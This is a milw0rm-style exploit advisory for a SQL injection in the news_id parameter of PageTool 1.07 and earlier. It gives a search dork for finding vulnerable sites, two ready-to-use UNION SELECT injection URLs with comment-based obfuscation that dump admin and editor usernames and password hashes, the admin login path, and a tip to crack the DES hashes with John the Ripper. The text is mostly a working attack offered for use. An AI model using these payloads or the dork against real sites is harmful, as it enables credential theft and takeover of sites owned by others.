PageTool 1.07 news_id Remote SQL Injection Vulnerability

* removed duplicate *

http://milw0rm.com/exploits/4107

/str0ke

--==+================================================================================+==--
--==+		    PageTool 1.07 AND Prior SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: www.pagetool.org
DORK: "Powered by Pagetool"


DESCRIPTION: 
pull admin/user credentials from the database


EXPLOITS:
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
www.site.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/NOT/**/LIKE/**/0x2561646D696E25/*


NOTE/TIP: 
admin login is at /index.php?name=pt_admin_man_en
all passwords are encrypted with the traditional DES algorithms, they can possibly be cracked with "John The Ripper"
first injection is admin, second is editors.


GREETZ: milw0rm.com, h4ck-y0u.org !



--==+================================================================================+==--
--==+		    PageTool 1.07 AND Prior SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-01-25]